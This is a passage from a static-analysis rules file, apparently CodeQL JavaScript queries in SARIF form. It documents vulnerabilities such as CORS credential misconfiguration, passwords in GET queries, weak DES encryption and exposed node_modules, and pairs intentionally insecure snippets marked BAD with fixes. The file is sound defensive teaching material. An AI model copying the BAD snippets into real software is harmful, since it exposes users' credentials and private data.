Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n"},"properties":{"tags":["security","external/cwe/cwe-502"],"description":"Deserializing user-controlled data may allow attackers to\n              execute arbitrary code.","id":"js/unsafe-deserialization","kind":"path-problem","name":"Deserialization of user-controlled data","precision":"high","problem.severity":"warning","security-severity":"9.8"}},{"id":"js/exposure-of-private-files","name":"js/exposure-of-private-files","shortDescription":{"text":"Exposure of private files"},"fullDescription":{"text":"Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n","markdown":"# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n"},"properties":{"tags":["security","external/cwe/cwe-200","external/cwe/cwe-219","external/cwe/cwe-548"],"description":"Exposing a node_modules folder, or the project folder to the public, can cause exposure\n              of private information.","id":"js/exposure-of-private-files","kind":"problem","name":"Exposure of private files","precision":"high","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/sensitive-get-query","name":"js/sensitive-get-query","shortDescription":{"text":"Sensitive data read from GET request"},"fullDescription":{"text":"Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n    const user = req.query.user;\n    const password = req.query.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n    const user = req.body.user;\n    const password = req.body.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n","markdown":"# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n    const user = req.query.user;\n    const password = req.query.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n    const user = req.body.user;\n    const password = req.body.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n"},"properties":{"tags":["security","external/cwe/cwe-598"],"description":"Placing sensitive data in a GET request increases the risk of\n              the data being exposed to an attacker.","id":"js/sensitive-get-query","kind":"problem","name":"Sensitive data read from GET request","precision":"high","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/tainted-format-string","name":"js/tainted-format-string","shortDescription":{"text":"Use of externally-controlled format string"},"fullDescription":{"text":"Using external input in format strings can lead to garbled output."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n","markdown":"# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n"},"properties":{"tags":["security","external/cwe/cwe-134"],"description":"Using external input in format strings can lead to garbled output.","id":"js/tainted-format-string","kind":"path-problem","name":"Use of externally-controlled format string","precision":"high","problem.severity":"warning","security-severity":"7.3"}},{"id":"js/cors-misconfiguration-for-credentials","name":"js/cors-misconfiguration-for-credentials","shortDescription":{"text":"CORS misconfiguration for credentials transfer"},"fullDescription":{"text":"Misconfiguration of CORS HTTP headers allows for leaks of secret credentials."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin;\n     // BAD: attacker can choose the value of origin\n    res.setHeader(\"Access-Control-Allow-Origin\", origin);\n    res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n    // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin,\n        whitelist = {\n            \"https://example.com\": true,\n            \"https://subdomain.example.com\": true,\n            \"https://example.com:1337\": true\n        };\n\n    if (origin in whitelist) {\n        // GOOD: the origin is in the whitelist\n        res.setHeader(\"Access-Control-Allow-Origin\", origin);\n        res.setHeader(\"Access-Control-Allow-Credentials\", true);\n    }\n\n    // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n","markdown":"# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin;\n     // BAD: attacker can choose the value of origin\n    res.setHeader(\"Access-Control-Allow-Origin\", origin);\n    res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n    // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin,\n        whitelist = {\n            \"https://example.com\": true,\n            \"https://subdomain.example.com\": true,\n            \"https://example.com:1337\": true\n        };\n\n    if (origin in whitelist) {\n        // GOOD: the origin is in the whitelist\n        res.setHeader(\"Access-Control-Allow-Origin\", origin);\n        res.setHeader(\"Access-Control-Allow-Credentials\", true);\n    }\n\n    // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n"},"properties":{"tags":["security","external/cwe/cwe-346","external/cwe/cwe-639","external/cwe/cwe-942"],"description":"Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.","id":"js/cors-misconfiguration-for-credentials","kind":"path-problem","name":"CORS misconfiguration for credentials transfer","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/weak-cryptographic-algorithm","name":"js/weak-cryptographic-algorithm","shortDescription":{"text":"Use of a broken or weak cryptographic algorithm"},"fullDescription":{"text":"Using broken or weak cryptographic algorithms can compromise security."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms may compromise security guarantees such as confidentiality, integrity, and authenticity.\n\nMany cryptographic algorithms are known to be weak or flawed. The security guarantees of a system often rely on the underlying cryptography, so using a weak algorithm can have severe consequences. For example:\n\n* If a weak encryption algorithm is used, an attacker may be able to decrypt sensitive data.\n* If a weak hashing algorithm is used to protect data integrity, an attacker may be able to craft a malicious input that has the same hash as a benign one.\n* If a weak algorithm is used for digital signatures, an attacker may be able to forge signatures and impersonate legitimate users.\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n","markdown":"# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms may compromise security guarantees such as confidentiality, integrity, and authenticity.\n\nMany cryptographic algorithms are known to be weak or flawed. The security guarantees of a system often rely on the underlying cryptography, so using a weak algorithm can have severe consequences. For example:\n\n* If a weak encryption algorithm is used, an attacker may be able to decrypt sensitive data.\n* If a weak hashing algorithm is used to protect data integrity, an attacker may be able to craft a malicious input that has the same hash as a benign one.\n* If a weak algorithm is used for digital signatures, an attacker may be able to forge signatures and impersonate legitimate users.\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n"},"properties":{"tags":["security","external/cwe/cwe-327","external/cwe/cwe-328"],"description":"Using broken or weak cryptographic algorithms can compromise security.","id":"js/weak-cryptographic-algorithm","kind":"path-problem","name":"Use of a broken or weak cryptographic algorithm","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/biased-cryptographic-random","name":"js/biased-cryptographic-random","shortDescription":{"text":"Creating biased random numbers from a cryptographically secure source"},"fullDescription":{"text":"Some mathematical operations on random numbers can cause bias in the results and compromise security."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n    digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n    const byte = crypto.randomBytes(1)[0];\n    if (byte >= 250) {\n        continue;\n    }\n    digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n","markdown":"# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n    digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n    const byte = crypto.randomBytes(1)[0];\n    if (byte >= 250) {\n        continue;\n    }\n    digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n"},"properties":{"tags":["security","external/cwe/cwe-327"],"description":"Some mathematical operations on random numbers can cause bias in\n              the results and compromise security.","id":"js/biased-cryptographic-random","kind":"problem","name":"Creating biased random numbers from a cryptographically secure source","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/resource-exhaustion-from-deep-object-traversal","name":"js/resource-exhaustion-from-deep-object-traversal","shortDescription":{"text":"Resources exhaustion from deep object traversal"},"fullDescription":{"text":"Processing user-controlled object hierarchies inefficiently can lead to denial of service."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: 